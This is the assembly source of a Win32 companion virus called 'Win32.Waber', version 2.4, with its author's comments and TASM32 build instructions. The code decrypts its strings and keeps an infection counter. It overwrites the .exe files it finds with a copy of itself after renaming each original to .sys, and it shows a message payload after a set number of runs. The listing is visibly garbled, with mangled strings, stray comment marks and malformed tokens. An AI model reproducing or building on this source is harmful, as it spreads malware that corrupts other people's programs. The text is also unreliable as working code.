; ================================================== =================================================================================================================================================================================
; ... :: win32.waber - virus :: ...
; Version 2.4
By -DIA- (c) 02
Germany
;
;
;
Here it is! My 1st win32.companion virus ... Success !!! :)
Don't Grumble About The Code, It's My 2th Win32.Virus ... and i go on. =)
DIA_HATES_MACHINE@gmx.de
;
;
;
Some Comments:
: -Decrypt the strings
; -read the counter> NOT EXIST = Make IT!
;> ife 0 = Go to the Virus and Infect Some Files
;> IF 0 = jmp to payload
; -payload:
; After 24 Starts The Payload Aktivate
IT Prints a nice message:
; ...: WEED AND BEER RULEZ: ...
Win32.Waber - Virus
; Version 2.4
By -DIA- (c) 02
[Please reset the waber-counter: "c: /waber.dll"]
--Virus renames found .exe to .sys file
; -virus copy itself to the .exe file
; -AFTER WORK The Host Runs!
; -allright ...
;
;
Greetz to monochrom - without you, this virus can't live :)
;
;
To Compile The Waber - Virus:
Tasm32 / z / ml / m3 Waber24,
; TLINK32 -TPE -C Waber24, Waber24, IMPORT32.LIB
;
To Compile The Waber - SYS:
Tasm32 / z / ml / m3 Waber24Sys,
; TLINK32 -TPE -C Waber24Sys, Waber24Sys, IMPORT32.LIB
Rename Waber24Sys.exe Waber24.sys
; ================================================== ================================================== *********************************************************** ****************************************
***** Cut ***** waber24.sys ***************************************************** ***************************************
; .386
; .Model flat
Jumps
;
EXTRN MessageBoxa: Proc
EXTRN EXITPROCESS: Proc
;
;.data
Titel DB '1st generation', 0
; MSG DB 'Win32.Waber - Virus', 10, 13
; DB 'Version 2.4', 10, 13
DB 'By-Dia- (C) 02', 10, 13
DB '[My 1st Companion Virus in Win32], 0
;
; .code
Start:
;
Push 16
; Push Offset Titel
PUSH OFFSET MSG
Push 0
Call MessageBoxa
;
Push 0
Call EXITPROCESS
;
; End Start
***** Cut ***** waber24.sys ***************************************************** ***************************************
*********************************************************** ************************************************
; ===== Have Fun ... ========================================= =====================================
.386
.MODEL FLAT
Jumps
EXTRN GETCOMMANDLINEA: PROC
EXTRN LSTRCPYA: Procextrn FindfirstFilea: Proc
EXTRN COPYFILEA: PROC
EXTRN FINDNEXTFILEA: PROC
EXTRN CREATEPROCESSA: PROC
EXTRN EXITPROCESS: PROC
EXTRN Messageboxa: Proc
EXTRN OpenFile: Proc
EXTRN CREATEFILEA: PROC
EXTRN WRITEFILE: PROC
EXTRN READFILE: PROC
EXTRN CLOSEHANDLE: PROC
EXTRN SETFILEPOINTER: PROC
.DATA
FileName DB '鶂骓埒 哞 斵 斵', -70
Titel DB '敂 敂 磉咿 磉咿 泛 泛 呷氲 呷氲 € €?, - 70
MSG DB '碛詨 垟碹 铓棜 铓棜?, - 80, -73
DB '爝 爝 詺垟 詺垟?, - 80, -73
DB '孛殚 麠殥 贀妶', -80, -73, -80, -73, -80, -73
DB '彡? 氲? 顨铗 氻埒哞 楖 纛 € € 骓 骓 埒 哞 斵 樼', -70
Firstnum db '?, - 70
Filemask DB '悢 ?', - 70
Number DB 01D DUP (0)
FileAttr DD 0
FileHandle DD 0
Read DD 0
Write DD 0
FindHandle DD 0
ProcessInfo DD 4 DUP (0)
Startupinfo DD 4 DUP (0)
Win32FindData DD 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
Findfile DB 200 DUP (0)
CreateFile DB 200 DUP (0)
VirusFile DB 200 DUP (0)
OrigInfile DB 200 DUP (0)
.code
Start:
; ----- Decrypt All Strings -------------------------------------- ----------------------------
Mov ESI, Offset FileName
Mov EDI, ESI
MOV ECX, 154D
Call Decrypt
; ------------------------------------------------- ------------------------------------------
; ----- Check The Counter ----------------------------------------- ----------------------------
Push 2
Push Offset FileAttr
Push Offset FileName
Call OpenFile
CMP EAX, 0FFFFFFFH
Je Makefile
Mov DWORD PTR [FileHandle], EAX
GOON:
Call setPointer
PUSH 0
Push Offset Read
Push 01D
Push Offset Number
Push DWORD PTR [FileHandle]
Call readfile
CMP BYTE PTR [Number], '0'
Je Boom
Dec Byte Ptr [Number]
Call setPointer
PUSH 0
Push Offset Write
Push 01d
Push Offset Number
Push DWORD PTR [FileHandle]
Call writefile
Push DWORD PTR [FileHandle]
Call Closehandle
JMP Waber
Makefile: Push 0
Push 80h
Push 2
PUSH 0
PUSH 0
Push 0C0000000H
Push Offset FileName
Call Createfilea
Mov DWORD PTR [FileHandle], EAX
Call setPointer
PUSH 0
Push Offset Write
Push 01d
Push Offset Firstnum
Push DWORD PTR [FileHandle]
Call writefile
JMP Goon
Boom:
Push DWORD PTR [FileHandle]
Call Closehandle
Push 16
Push Offset Titel
Push Offset MSG
PUSH 0
Call Messageboxa
JMP EXIT
SetPointer:
PUSH 0
PUSH 0
PUSH 0
Push DWORD PTR [FileHandle]
Call setfilepointer
RET
; ------------------------------------------------- ------------------------------------------
; ----- Decrypt Loop -------------------------------------------------------------------------------------------------------------------- --------------------------------
Decrypt:
Lodsb
XOR Al, 69D
Not al
Stosb
Loop Decrypt
RET
; ------------------------------------------------- ------------------------------------------
; ----- Infect Some Filez ----------------------------------------- ----------------------------
Waber:
Call getcommandlinea
Push EAX
Push Offset Virusfile
Call lstrcpya
Mov Eax, Offset Virusfile
GetPoint1:
CMP Byte Ptr [EAX], '.'
JZ FoundPoint1
INC EAX
JMP getPoint1
FoundPoint1:
Add Eax, 04D
MOV Byte Ptr [EAX], 00
Push Offset VirusFile 1
Push offset OrigInfile
Call lstrcpya
Mov Eax, Offset OrigInfile
GetPoint2:
CMP Byte Ptr [EAX], '.'
JZ FoundPoint2
INC EAX
JMP getPoint2
FoundPoint2:
INC EAX
Mov DWORD PTR [EAX], 535953H
Push Offset Win32Finddata
Push Offset Filemask
Call FindfirstFilea
Mov DWORD PTR [FindHandle], EAX
FINDNEXT:
CMP EAX, -1
Je Runhost
OR EAX, EAX
JZ Runhost
Push Offset Findfile
Push Offset Createfile
Call lstrcpya
Mov Eax, Offset Createfile
GetPoint3:
CMP Byte Ptr [EAX], '.'
JZ FoundPoint3
INC EAX
JMP getPoint3
FoundPoint3: Inc EAX
Mov DWORD PTR [EAX], 535953H
Push 1
Push Offset Createfile
Push Offset Findfile
Call Copyfilea
PUSH 0
Push Offset Findfile
Push Offset VirusFile 1
Call Copyfilea
Push Offset Win32Finddata
Push DWORD PTR [FindHandle]
Call FindnextFilea
JMP FindNext
Runhost:
Push Offset ProcessInfo
Push Offset StartupInfo
PUSH 0
PUSH 0
Push 00000010h
PUSH 0
PUSH 0
PUSH 0
Push offset OrigInfile
Push offset OrigInfile
Call CreateProcessa
EXIT:
PUSH 0
Call EXITPROCESS
; -Weed - and - beer - rulez ----- DIA -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------
End Start
; ================================================== =================================================================================================================================================================================
